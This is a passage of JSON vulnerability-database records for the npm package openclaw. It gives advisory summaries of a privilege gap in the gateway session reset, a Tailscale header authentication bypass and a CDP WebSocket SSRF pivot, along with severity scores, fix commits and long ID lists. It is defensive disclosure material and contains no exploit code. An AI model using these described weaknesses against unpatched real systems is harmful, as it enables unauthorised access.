,{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{
"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-40037","GHSA-qx8j-g322-qj6m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wmr3-83u3-6qdb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91253?format=json","vulnerability_id":"VCID-wut7-y72y-9ucb","summary":"OpenClaw: Gateway agent /reset exposes admin session reset to operator.write callers\n## Summary\nBefore `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/new` for callers with only `operator.write`, even though the direct `sessions.reset` RPC correctly requires `operator.admin`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable path lived in `src/gateway/server-methods/agent.ts`. 
A `/reset` or `/new` message with an explicit `sessionKey` reached `performGatewaySessionReset(...)` without enforcing the same `operator.admin` guard used by `sessions.reset`.\n\n## Fix Commit(s)\n- `50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0` — `fix(gateway): require admin for agent session reset`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server-methods/agent.ts` now rejects `/reset` and `/new` for callers that do not have `operator.admin` before calling `performGatewaySessionReset(...)`.\n- `src/gateway/server-methods/agent.test.ts` contains the regression test `rejects /reset for write-scoped gateway callers`.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35660","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16539","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16494","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16536","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35660"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.1","scoring_syst
em":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35660","reference_id":"CVE-2026-35660","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35660"},{"reference_url":"https://github.com/advisories/GHSA-wq58-2pvg-5h4f","reference_id":"GHSA-wq58-2pvg-5h4f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wq58-2pvg-5h4f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset","reference_id":"openclaw-insufficient-access-con
trol-in-gateway-agent-session-reset","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},
{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},
{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},
{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},
{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["CVE-2026-35660","GHSA-wq58-2pvg-5h4f"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wut7-y72y-9ucb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91186?format=json","vulnerability_id":"VCID-wwcu-de9t-d3ca","summary":"Duplicate Advisory: OpenClaw's gateway tokenless Tailscale auth applied to HTTP routes\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-hff7-ccv5-52f8. 
This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 incorrectly apply tokenless Tailscale header authentication to HTTP gateway routes, allowing bypass of token and password requirements. Attackers on trusted networks can exploit this misconfiguration to access HTTP gateway routes without proper authentication credentials.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/356d61aacfa5b0f1d5830716ec59d70682a3e7b8","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/356d61aacfa5b0f1d5830716ec59d70682a3e7b8"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-http-gateway-routes-via-tokenless-tailscale-auth","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-in-http-gateway-routes-via-tokenless-tailscale-auth"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32045","reference_id":"CVE-2026-32045","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_e
lements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32045"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hff7-ccv5-52f8","reference_id":"GHSA-hff7-ccv5-52f8","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hff7-ccv5-52f8"},{"reference_url":"https://github.com/advisories/GHSA-qwmf-95r9-gx9x","reference_id":"GHSA-qwmf-95r9-gx9x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qwmf-95r9-gx9x"}],"fixed_packages":[],"aliases":["GHSA-qwmf-95r9-gx9x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wwcu-de9t-d3ca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89666?format=json","vulnerability_id":"VCID-wyce-qxau-mqff","summary":"OpenClaw: CDP /json/version WebSocket URL could pivot to untrusted second-hop targets\n## Summary\n\nCDP /json/version WebSocket URL could pivot to untrusted second-hop targets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.5`\n- 
Patched versions: `>= 2026.4.5`\n\n## Impact\n\nA browser profile could trust a CDP `/json/version` response whose `webSocketDebuggerUrl` pointed at a different host, enabling a second-hop SSRF-style pivot.\n\n## Technical Details\n\nThe fix normalizes and re-validates direct CDP WebSocket targets before connecting.\n\n## Fix\n\nThe issue was fixed in #60469. The first stable tag containing the fix is `v2026.4.5`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `bc356cc8c2beaa747c71dd86cceab8f804699665`\n- PR: #60469\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.5 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43576","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10189","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10209","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11778","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43576"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/
C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"}],"url":"https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665"},{"reference_url":"https://github.com/openclaw/openclaw/pull/60469","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/60469"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43576","reference_id":"","reference_type":"","